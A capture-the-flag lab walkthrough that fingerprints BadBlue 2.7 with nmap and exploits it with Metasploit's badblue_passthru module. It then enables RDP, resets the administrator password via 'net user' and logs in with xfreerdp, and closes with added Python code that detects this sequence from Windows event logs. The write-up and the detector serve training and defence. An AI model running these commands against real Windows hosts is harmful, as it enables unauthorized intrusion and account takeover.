Windows: Enabling Remote Desktop
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable application will be accessible at demo.ine.local.
Your task is to fingerprint the vulnerable application using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework. Then, enable the RDP service on the target machine and access it using the xfreerdp tool.
Objective: Find and exploit the vulnerable application, then get an RDP session to find the flag!
Note: rdesktop will not work on this setup as it does not support NLA. Please use xfreerdp to connect to the RDP server.
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
xfreerdp
Writeup
nmap -sSVC demo.ine.local
PORT      STATE SERVICE      VERSION
80/tcp    open  http         BadBlue httpd 2.7
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49165/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-06-10T18:08:35
|_  start_date: 2025-06-10T18:06:00

msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS demo.ine.local
exploit
background
use post/windows/manage/enable_rdp
set session 1
run
sessions -i 1
shell
net user administrator cibaism_o5
xfreerdp /u:administrator /p:cibaism_o5 /v:demo.ine.local
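
From the defender's side, the sequence in this writeup (RDP switched on, a local account's password reset, then an RDP logon with that account) leaves events that can be correlated per host. The following Python example is added here and is not part of the original lab; it assumes Sysmon event 13 (registry value set) and Security events 4724 and 4624 are collected, and the sample events, host names, addresses and flat field names are constructed.

```python
from datetime import datetime, timedelta

RDP_VALUE = r"\control\terminal server\fdenytsconnections"

# Constructed sample events; hosts, users, IPs and the flat field names are assumptions.
EVENTS = [
    {"time": "2025-01-01T10:00:11", "host": "HOST-A", "id": 13,
     "target": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"time": "2025-01-01T10:01:40", "host": "HOST-A", "id": 4724, "user": "Administrator"},
    {"time": "2025-01-01T10:02:05", "host": "HOST-A", "id": 4624, "logon_type": 10,
     "user": "Administrator", "src_ip": "192.0.2.10"},
    # Ordinary RDP logon on another host: no preceding enable or reset, so no alert.
    {"time": "2025-01-01T09:00:00", "host": "HOST-B", "id": 4624, "logon_type": 10,
     "user": "alice", "src_ip": "192.0.2.20"},
]


def classify(ev):
    """Map one event to a stage of the sequence, or None if it is unrelated."""
    if ev["id"] == 13:  # Sysmon: registry value set; 0 means RDP connections allowed
        hit = ev.get("target", "").lower().endswith(RDP_VALUE)
        return "rdp_enabled" if hit and ev.get("details", "").endswith("(0x00000000)") else None
    if ev["id"] == 4724:  # Security: attempt to reset an account's password
        return "password_reset"
    if ev["id"] == 4624 and ev.get("logon_type") == 10:  # RemoteInteractive logon
        return "rdp_logon"
    return None


def detect(events, window=timedelta(minutes=30)):
    """Alert when an RDP logon follows an RDP enable and a reset of the same account."""
    state, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        stage = classify(ev)
        if stage is None:
            continue
        when = datetime.fromisoformat(ev["time"])
        host = state.setdefault(ev["host"], {"enabled": None, "resets": {}})
        if stage == "rdp_enabled":
            host["enabled"] = when
        elif stage == "password_reset":
            host["resets"][ev["user"].lower()] = when
        else:
            enabled, reset = host["enabled"], host["resets"].get(ev["user"].lower())
            if enabled and reset and when - min(enabled, reset) <= window:
                alerts.append({"host": ev["host"], "user": ev["user"],
                               "src_ip": ev.get("src_ip"), "time": ev["time"]})
    return alerts
```

Calling `detect(EVENTS)` returns one alert for HOST-A; the 30-minute window is an arbitrary starting value to tune against normal administrative activity.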